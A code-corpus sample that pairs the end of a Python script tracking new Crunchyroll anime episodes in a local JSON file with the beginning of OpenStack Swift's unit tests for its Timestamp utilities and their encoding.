if verif_episode is True:
url = scraper.get('https://www.crunchyroll.com' + info_dict_url[name])
soup = BeautifulSoup(url.content, 'lxml')
data = soup.find('ul', {'class': "list-of-seasons cf"})
episode_num = data.div.span.text.strip()
episode_title = data.div.p.text.strip()
print(f'{Fore.BLUE}{Style.BRIGHT}{episode_num}-{episode_title}{Style.NORMAL} of '
f'{Fore.YELLOW}{Style.BRIGHT}{name}{Style.NORMAL}{Fore.BLUE}'
f' is available now!!{Style.RESET_ALL}')
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
# dictionaries
for animes in json_data:
# keys
for anime in animes:
anime_url = animes[anime][0]["url"]
url = scraper.get(anime_url)
soup = BeautifulSoup(url.content, features='lxml')
data = soup.find('ul', {'class': "list-of-seasons cf"})
data_2 = data.find_all('li', {'class': "season small-margin-bottom"})
data = data_2
ordem = len(data) + 1
list_value = []
for tag in data:
ordem = ordem - 1
sub_anime = tag.a['title']
try:
episode_num = tag.find('div').span.text.strip()
episode_title = tag.find('div').p.text.strip()
except AttributeError:
episode_num = 'Episódio -'
episode_title = '-'
finally:
dict_value = {'season': sub_anime,
'last available episode': episode_num + ' - ' + episode_title,
'last watched episode': 'Episódio -', 'url': anime_url, 'season_id': ordem}
list_value.append(dict_value)
list_value.sort(key=lambda e: e['season_id'], reverse=True)
if animes[anime] == list_value:
pass
else:
for season in animes[anime]:
season_site = list(filter(lambda e: e['season'] == season['season'], list_value))
season_site = season_site[0]
season['last available episode'] = season_site['last available episode']
season['season_id'] = season_site['season_id']
list_value.remove(season_site)
if len(list_value) != 0:
for season in list_value:
animes[anime].append(season)
animes[anime].sort(key=lambda e: e['season_id'], reverse=True)
anime_json.seek(0)
json.dump(json_data, anime_json, indent=2)
anime_json.truncate()
for i in range(1, 1801):
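# wait ~30 minutes (1800 x 1s) between checks, polling the quit flag every second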
if verif_sair is False:
time.sleep(1)
elif verif_sair is True:
exit(0)
threading.Thread(target=interface).start()
time.sleep(2)
threading.Thread(target=check_update_continually).start()
|
test_utils.py
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.common.utils"""
from __future__ import print_function
from test.unit import temptree
import ctypes
import contextlib
import errno
import eventlet
import eventlet.event
import functools
import grp
import logging
import os
import mock
import random
import re
import socket
import stat
import sys
import json
import math
import six
from six import BytesIO, StringIO
from six.moves.queue import Queue, Empty
from six.moves import range
from textwrap import dedent
import tempfile
import time
import traceback
import unittest
import fcntl
import shutil
from getpass import getuser
from shutil import rmtree
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from netifaces import AF_INET6
from mock import MagicMock, patch
from six.moves.configparser import NoSectionError, NoOptionError
from swift.common.exceptions import Timeout, MessageTimeout, \
ConnectionTimeout, LockTimeout, ReplicationLockTimeout, \
MimeInvalid, ThreadPoolDead
from swift.common import utils
from swift.common.container_sync_realms import ContainerSyncRealms
from swift.common.header_key_dict import HeaderKeyDict
from swift.common.swob import Request, Response
from test.unit import FakeLogger
threading = eventlet.patcher.original('threading')
class MockOs(object):
def __init__(self, pass_funcs=None, called_funcs=None, raise_funcs=None):
if pass_funcs is None:
pass_funcs = []
if called_funcs is None:
called_funcs = []
if raise_funcs is None:
raise_funcs = []
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
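# these process-related os calls are plain no-ops by default, so code under
# test that daemonizes or drops privileges runs harmlessly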
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# I only over-ride portions of the os module
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket(object):
def __init__(self, sendto_errno=None):
self.sent = []
self.sendto_errno = sendto_errno
def sendto(self, data, target):
if self.sendto_errno:
raise socket.error(self.sendto_errno,
'test errno %s' % self.sendto_errno)
self.sent.append((data, target))
def close(self):
pass
class MockSys(object):
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
def reset_loggers():
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
# Reset the LogAdapter class thread local state. Use get_logger() here
# to fetch a LogAdapter instance because the items from
# get_logger.handler4logger above are the underlying logger instances,
# not the LogAdapter.
utils.get_logger(None).thread_locals = (None, None)
def reset_logger_state(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
reset_loggers()
try:
return f(self, *args, **kwargs)
finally:
reset_loggers()
return wrapper
class TestTimestamp(unittest.TestCase):
"""Tests for swift.common.utils.Timestamp"""
def test_invalid_input(self):
self.assertRaises(ValueError, utils.Timestamp, time.time(), offset=-1)
def test_invalid_string_conversion(self):
t = utils.Timestamp(time.time())
self.assertRaises(TypeError, str, t)
def test_offset_limit(self):
t = 1417462430.78693
# can't have an offset above MAX_OFFSET
self.assertRaises(ValueError, utils.Timestamp, t,
offset=utils.MAX_OFFSET + 1)
# exactly max offset is fine
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET)
self.assertEqual(ts.internal, '1417462430.78693_ffffffffffffffff')
# but you can't offset it further
self.assertRaises(ValueError, utils.Timestamp, ts.internal, offset=1)
# unless you start below it
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET - 1)
self.assertEqual(utils.Timestamp(ts.internal, offset=1),
'1417462430.78693_ffffffffffffffff')
def test_normal_format_no_offset(self):
expected = '1402436408.91203'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.912029,
1402436408.9120300000000000,
1402436408.91202999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.912029, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.91203_00000000'),
utils.Timestamp('1402436408.91203_00000000', offset=0),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.normal, expected)
# timestamp instance can also compare to string or float
self.assertEqual(timestamp, expected)
self.assertEqual(timestamp, float(expected))
self.assertEqual(timestamp, utils.normalize_timestamp(expected))
def test_isoformat(self):
expected = '2014-06-10T22:47:32.054580'
test_values = (
'1402440452.05458',
'1402440452.054579',
'1402440452.05458_00000000',
'1402440452.054579_00000000',
'1402440452.054580000',
'1402440452.054579999',
'1402440452.054580000_0000000000000',
'1402440452.054579999_0000ff00',
'000001402440452.054580000',
'000001402440452.0545799',
'000001402440452.054580000_0000000000',
'000001402440452.054579999999_00000fffff',
1402440452.05458,
1402440452.054579,
1402440452.0545800000000000,
1402440452.054579999,
utils.Timestamp(1402440452.05458),
utils.Timestamp(1402440452.0545799),
utils.Timestamp(1402440452.05458, offset=0),
utils.Timestamp(1402440452.05457999999, offset=0),
utils.Timestamp(1402440452.05458, offset=100),
utils.Timestamp(1402440452.054579, offset=100),
utils.Timestamp('1402440452.05458'),
utils.Timestamp('1402440452.054579999'),
utils.Timestamp('1402440452.05458', offset=0),
utils.Timestamp('1402440452.054579', offset=0),
utils.Timestamp('1402440452.05458', offset=300),
utils.Timestamp('1402440452.05457999', offset=300),
utils.Timestamp('1402440452.05458_00000000'),
utils.Timestamp('1402440452.05457999_00000000'),
utils.Timestamp('1402440452.05458_00000000', offset=0),
utils.Timestamp('1402440452.05457999_00000aaa', offset=0),
utils.Timestamp('1402440452.05458_00000000', offset=400),
utils.Timestamp('1402440452.054579_0a', offset=400),
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
expected = '1970-01-01T00:00:00.000000'
test_values = (
'0',
'0000000000.00000',
'0000000000.00000_ffffffffffff',
0,
0.0,
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
def test_not_equal(self):
ts = '1402436408.91203_0000000000000001'
test_values = (
utils.Timestamp('1402436408.91203_0000000000000002'),
utils.Timestamp('1402436408.91203'),
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91204),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.91203, offset=2),
)
for value in test_values:
self.assertTrue(value != ts)
self.assertIs(True, utils.Timestamp(ts) == ts) # sanity
self.assertIs(False, utils.Timestamp(ts) != utils.Timestamp(ts))
self.assertIs(False, utils.Timestamp(ts) != ts)
self.assertIs(False, utils.Timestamp(ts) is None)
self.assertIs(True, utils.Timestamp(ts) is not None)
def test_no_force_internal_no_offset(self):
"""Test that internal is the same as normal with no offset"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0).internal, '0000000000.00000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(0).internal,
utils.normalize_timestamp(0))
def test_no_force_internal_with_offset(self):
"""Test that internal always includes the offset if significant"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=240).internal,
'1402437380.58186_00000000000000f0')
self.assertEqual(
utils.Timestamp('1402437380.581859_00000001',
offset=240).internal,
'1402437380.58186_00000000000000f1')
def test_force_internal(self):
"""Test that internal always includes the offset if forced"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=True):
self.assertEqual(utils.Timestamp(0).internal,
'0000000000.00000_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=16).internal,
'1402437380.58186_0000000000000010')
def test_internal_format_no_offset(self):
expected = '1402436408.91203_0000000000000000'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.9120300000000000,
1402436408.912029,
1402436408.912029999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.91202999999999999, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.912029'),
utils.Timestamp('1402436408.912029', offset=0),
utils.Timestamp('1402436408.912029999999999'),
utils.Timestamp('1402436408.912029999999999', offset=0),
)
for value in test_values:
# timestamp instance is always equivalent
self.assertEqual(utils.Timestamp(value), expected)
if utils.FORCE_INTERNAL:
# the FORCE_INTERNAL flag makes the internal format always
# include the offset portion of the timestamp even when it's
# not significant and would be bad during upgrades
self.assertEqual(utils.Timestamp(value).internal, expected)
else:
# unless we FORCE_INTERNAL, when there's no offset the
# internal format is equivalent to the normalized format
self.assertEqual(utils.Timestamp(value).internal,
'1402436408.91203')
def test_internal_format_with_offset(self):
expected = '1402436408.91203_00000000000000f0'
test_values = (
'1402436408.91203_000000f0',
'1402436408.912030000_0000000000f0',
'1402436408.912029_000000f0',
'1402436408.91202999999_0000000000f0',
'000001402436408.912030000_000000000f0',
'000001402436408.9120299999_000000000f0',
utils.Timestamp(1402436408.91203, offset=240),
utils.Timestamp(1402436408.912029, offset=240),
utils.Timestamp('1402436408.91203', offset=240),
utils.Timestamp('1402436408.91203_00000000', offset=240),
utils.Timestamp('1402436408.91203_0000000f', offset=225),
utils.Timestamp('1402436408.9120299999', offset=240),
utils.Timestamp('1402436408.9120299999_00000000', offset=240),
utils.Timestamp('1402436408.9120299999_00000010', offset=224),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.internal, expected)
# can compare with offset if the string is internalized
self.assertEqual(timestamp, expected)
# if comparison value only includes the normalized portion and the
# timestamp includes an offset, it is considered greater
normal = utils.Timestamp(expected).normal
self.assertTrue(timestamp > normal,
'%r is not bigger than %r given %r' % (
timestamp, normal, value))
self.assertTrue(timestamp > float(normal),
'%r is not bigger than %f given %r' % (
timestamp, float(normal), value))
def test_short_format_with_offset(self):
expected = '1402436408.91203_f0'
timestamp = utils.Timestamp(1402436408.91203, 0xf0)
self.assertEqual(expected, timestamp.short)
expected = '1402436408.91203'
timestamp = utils.Timestamp(1402436408.91203)
self.assertEqual(expected, timestamp.short)
def test_raw(self):
expected = 140243640891203
timestamp = utils.Timestamp(1402436408.91203)
self.assertEqual(expected, timestamp.raw)
# 'raw' does not include offset
timestamp = utils.Timestamp(1402436408.91203, 0xf0)
self.assertEqual(expected, timestamp.raw)
def test_delta(self):
def _assertWithinBounds(expected, timestamp):
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
self.assertTrue(float(timestamp) > minimum)
self.assertTrue(float(timestamp) < maximum)
timestamp = utils.Timestamp(1402436408.91203, delta=100)
_assertWithinBounds(1402436408.91303, timestamp)
self.assertEqual(140243640891303, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=-100)
_assertWithinBounds(1402436408.91103, timestamp)
self.assertEqual(140243640891103, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=0)
_assertWithinBounds(1402436408.91203, timestamp)
self.assertEqual(140243640891203, timestamp.raw)
# delta is independent of offset
timestamp = utils.Timestamp(1402436408.91203, offset=42, delta=100)
self.assertEqual(140243640891303, timestamp.raw)
self.assertEqual(42, timestamp.offset)
# cannot go negative
self.assertRaises(ValueError, utils.Timestamp, 1402436408.91203,
delta=-140243640891203)
def test_int(self):
expected = 1402437965
test_values = (
'1402437965.91203',
'1402437965.91203_00000000',
'1402437965.912030000',
'1402437965.912030000_0000000000000',
'000001402437965.912030000',
'000001402437965.912030000_0000000000',
1402437965.91203,
1402437965.9120300000000000,
1402437965.912029,
1402437965.912029999999999999,
utils.Timestamp(1402437965.91203),
utils.Timestamp(1402437965.91203, offset=0),
utils.Timestamp(1402437965.91203, offset=500),
utils.Timestamp(1402437965.912029),
utils.Timestamp(1402437965.91202999999999999, offset=0),
utils.Timestamp(1402437965.91202999999999999, offset=300),
utils.Timestamp('1402437965.91203'),
utils.Timestamp('1402437965.91203', offset=0),
utils.Timestamp('1402437965.91203', offset=400),
utils.Timestamp('1402437965.912029'),
utils.Timestamp('1402437965.912029', offset=0),
utils.Timestamp('1402437965.912029', offset=200),
utils.Timestamp('1402437965.912029999999999'),
utils.Timestamp('1402437965.912029999999999', offset=0),
utils.Timestamp('1402437965.912029999999999', offset=100),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(int(timestamp), expected)
self.assertTrue(timestamp > expected)
def test_float(self):
expected = 1402438115.91203
test_values = (
'1402438115.91203',
'1402438115.91203_00000000',
'1402438115.912030000',
'1402438115.912030000_0000000000000',
'000001402438115.912030000',
'000001402438115.912030000_0000000000',
1402438115.91203,
1402438115.9120300000000000,
1402438115.912029,
1402438115.912029999999999999,
utils.Timestamp(1402438115.91203),
utils.Timestamp(1402438115.91203, offset=0),
utils.Timestamp(1402438115.91203, offset=500),
utils.Timestamp(1402438115.912029),
utils.Timestamp(1402438115.91202999999999999, offset=0),
utils.Timestamp(1402438115.91202999999999999, offset=300),
utils.Timestamp('1402438115.91203'),
utils.Timestamp('1402438115.91203', offset=0),
utils.Timestamp('1402438115.91203', offset=400),
utils.Timestamp('1402438115.912029'),
utils.Timestamp('1402438115.912029', offset=0),
utils.Timestamp('1402438115.912029', offset=200),
utils.Timestamp('1402438115.912029999999999'),
utils.Timestamp('1402438115.912029999999999', offset=0),
utils.Timestamp('1402438115.912029999999999', offset=100),
)
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertTrue(float(timestamp) > minimum,
'%f is not bigger than %f given %r' % (
timestamp, minimum, value))
self.assertTrue(float(timestamp) < maximum,
'%f is not smaller than %f given %r' % (
timestamp, maximum, value))
# direct comparison of timestamp works too
self.assertTrue(timestamp > minimum,
'%s is not bigger than %f given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < maximum,
'%s is not smaller than %f given %r' % (
timestamp.normal, maximum, value))
# ... even against strings
self.assertTrue(timestamp > '%f' % minimum,
'%s is not bigger than %s given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < '%f' % maximum,
'%s is not smaller than %s given %r' % (
timestamp.normal, maximum, value))
def test_false(self):
self.assertFalse(utils.Timestamp(0))
self.assertFalse(utils.Timestamp(0, offset=0))
self.assertFalse(utils.Timestamp('0'))
self.assertFalse(utils.Timestamp('0', offset=0))
self.assertFalse(utils.Timestamp(0.0))
self.assertFalse(utils.Timestamp(0.0, offset=0))
self.assertFalse(utils.Timestamp('0.0'))
self.assertFalse(utils.Timestamp('0.0', offset=0))
self.assertFalse(utils.Timestamp(00000000.00000000))
self.assertFalse(utils.Timestamp(00000000.00000000, offset=0))
self.assertFalse(utils.Timestamp('00000000.00000000'))
self.assertFalse(utils.Timestamp('00000000.00000000', offset=0))
def test_true(self):
self.assertTrue(utils.Timestamp(1))
self.assertTrue(utils.Timestamp(1, offset=1))
self.assertTrue(utils.Timestamp(0, offset=1))
self.assertTrue(utils.Timestamp('1'))
self.assertTrue(utils.Timestamp('1', offset=1))
self.assertTrue(utils.Timestamp('0', offset=1))
self.assertTrue(utils.Timestamp(1.1))
self.assertTrue(utils.Timestamp(1.1, offset=1))
self.assertTrue(utils.Timestamp(0.0, offset=1))
self.assertTrue(utils.Timestamp('1.1'))
self.assertTrue(utils.Timestamp('1.1', offset=1))
self.assertTrue(utils.Timestamp('0.0', offset=1))
self.assertTrue(utils.Timestamp(11111111.11111111))
self.assertTrue(utils.Timestamp(11111111.11111111, offset=1))
self.assertTrue(utils.Timestamp(00000000.00000000, offset=1))
self.assertTrue(utils.Timestamp('11111111.11111111'))
self.assertTrue(utils.Timestamp('11111111.11111111', offset=1))
self.assertTrue(utils.Timestamp('00000000.00000000', offset=1))
def test_greater_no_offset(self):
now = time.time()
older = now - 1
timestamp = utils.Timestamp(now)
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443112.213252, '1402443112.213252', '1402443112.213252_ffff',
older, '%f' % older, '%f_0000ffff' % older,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_greater_with_offset(self):
now = time.time()
older = now - 1
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443346.935174, '1402443346.93517', '1402443346.935169_ffff',
older, '%f' % older, '%f_0000ffff' % older,
now, '%f' % now, '%f_00000000' % now,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_smaller_no_offset(self):
now = time.time()
newer = now + 1
timestamp = utils.Timestamp(now)
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_smaller_with_offset(self):
now = time.time()
newer = now + 1
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_cmp_with_none(self):
self.assertGreater(utils.Timestamp(0), None)
self.assertGreater(utils.Timestamp(1.0), None)
self.assertGreater(utils.Timestamp(1.0, 42), None)
def test_ordering(self):
given = [
'1402444820.62590_000000000000000a',
'1402444820.62589_0000000000000001',
'1402444821.52589_0000000000000004',
'1402444920.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589_000000000000000a',
'1402444920.62589_0000000000000002',
'1402444820.62589_0000000000000002',
'1402444820.62589_000000000000000a',
'1402444820.62590_0000000000000004',
'1402444920.62589_000000000000000a',
'1402444820.62590_0000000000000002',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000000',
'1402444920.62589',
'1402444821.62589_0000000000000004',
'1402444821.72589_0000000000000001',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62589_0000000000000004',
'1402444821.72589_0000000000000000',
'1402444821.52589_000000000000000a',
'1402444821.72589_0000000000000004',
'1402444821.62589',
'1402444821.52589_0000000000000001',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.72589_0000000000000002',
'1402444820.62589',
'1402444920.62589_0000000000000001']
expected = [
'1402444820.62589',
'1402444820.62589_0000000000000001',
'1402444820.62589_0000000000000002',
'1402444820.62589_0000000000000004',
'1402444820.62589_000000000000000a',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62590_0000000000000002',
'1402444820.62590_0000000000000004',
'1402444820.62590_000000000000000a',
'1402444821.52589',
'1402444821.52589_0000000000000001',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000004',
'1402444821.52589_000000000000000a',
'1402444821.62589',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589',
'1402444821.72589_0000000000000001',
'1402444821.72589_0000000000000002',
'1402444821.72589_0000000000000004',
'1402444821.72589_000000000000000a',
'1402444920.62589',
'1402444920.62589_0000000000000001',
'1402444920.62589_0000000000000002',
'1402444920.62589_0000000000000004',
'1402444920.62589_000000000000000a',
]
# less visual version
"""
now = time.time()
given = [
utils.Timestamp(now + i, offset=offset).internal
for i in (0, 0.00001, 0.9, 1.0, 1.1, 100.0)
for offset in (0, 1, 2, 4, 10)
]
expected = [t for t in given]
random.shuffle(given)
"""
self.assertEqual(len(given), len(expected)) # sanity
timestamps = [utils.Timestamp(t) for t in given]
# our expected values don't include insignificant offsets
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(
[t.internal for t in sorted(timestamps)], expected)
# string sorting works as well
self.assertEqual(
sorted([t.internal for t in timestamps]), expected)
def test_hashable(self):
ts_0 = utils.Timestamp('1402444821.72589')
ts_0_also = utils.Timestamp('1402444821.72589')
self.assertEqual(ts_0, ts_0_also) # sanity
self.assertEqual(hash(ts_0), hash(ts_0_also))
d = {ts_0: 'whatever'}
self.assertIn(ts_0, d) # sanity
self.assertIn(ts_0_also, d)
class TestTimestampEncoding(unittest.TestCase):
def setUp(self):
t0 = utils.Timestamp(0.0)
t1 = utils.Timestamp(997.9996)
t2 = utils.Timestamp(999)
t3 = utils.Timestamp(1000, 24)
t4 = utils.Timestamp(1001)
t5 = utils.Timestamp(1002.00040)
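        # An encoded value is the data timestamp's internal form, optionally
        # followed by signed hex deltas (in 10-microsecond units) for the
        # content-type and metadata timestamps.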
# encodings that are expected when explicit = False
self.non_explicit_encodings = (
('0000001000.00000_18', (t3, t3, t3)),
('0000001000.00000_18', (t3, t3, None)),
)
# mappings that are expected when explicit = True
self.explicit_encodings = (
('0000001000.00000_18+0+0', (t3, t3, t3)),
('0000001000.00000_18+0', (t3, t3, None)),
)
# mappings that are expected when explicit = True or False
self.encodings = (
('0000001000.00000_18+0+186a0', (t3, t3, t4)),
('0000001000.00000_18+186a0+186c8', (t3, t4, t5)),
('0000001000.00000_18-186a0+0', (t3, t2, t2)),
('0000001000.00000_18+0-186a0', (t3, t3, t2)),
('0000001000.00000_18-186a0-186c8', (t3, t2, t1)),
('0000001000.00000_18', (t3, None, None)),
('0000001000.00000_18+186a0', (t3, t4, None)),
('0000001000.00000_18-186a0', (t3, t2, None)),
('0000001000.00000_18', (t3, None, t1)),
('0000001000.00000_18-5f5e100', (t3, t0, None)),
('0000001000.00000_18+0-5f5e100', (t3, t3, t0)),
('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)),
)
# decodings that are expected when explicit = False
self.non_explicit_decodings = (
('0000001000.00000_18', (t3, t3, t3)),
('0000001000.00000_18+186a0', (t3, t4, t4)),
('0000001000.00000_18-186a0', (t3, t2, t2)),
('0000001000.00000_18+186a0', (t3, t4, t4)),
('0000001000.00000_18-186a0', (t3, t2, t2)),
('0000001000.00000_18-5f5e100', (t3, t0, t0)),
)
# decodings that are expected when explicit = True
self.explicit_decodings = (
('0000001000.00000_18+0+0', (t3, t3, t3)),
('0000001000.00000_18+0', (t3, t3, None)),
('0000001000.00000_18', (t3, None, None)),
('0000001000.00000_18+186a0', (t3, t4, None)),
('0000001000.00000_18-186a0', (t3, t2, None)),
('0000001000.00000_18-5f5e100', (t3, t0, None)),
)
# decodings that are expected when explicit = True or False
self.decodings = (
('0000001000.00000_18+0+186a0', (t3, t3, t4)),
('0000001000.00000_18+186a0+186c8', (t3, t4, t5)),
('0000001000.00000_18-186a0+0', (t3, t2, t2)),
('0000001000.00000_18+0-186a0', (t3, t3, t2)),
('0000001000.00000_18-186a0-186c8', (t3, t2, t1)),
('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)),
)
def _assertEqual(self, expected, actual, test):
self.assertEqual(expected, actual,
'Got %s but expected %s for parameters %s'
% (actual, expected, test))
def test_encoding(self):
for test in self.explicit_encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], True)
self._assertEqual(test[0], actual, test[1])
for test in self.non_explicit_encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], False)
self._assertEqual(test[0], actual, test[1])
for explicit in (True, False):
for test in self.encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], explicit)
self._assertEqual(test[0], actual, test[1])
def test_decoding(self):
for test in self.explicit_decodings:
actual = utils.decode_timestamps(test[0], True)
self._assertEqual(test[1], actual, test[0])
for test in self.non_explicit_decodings:
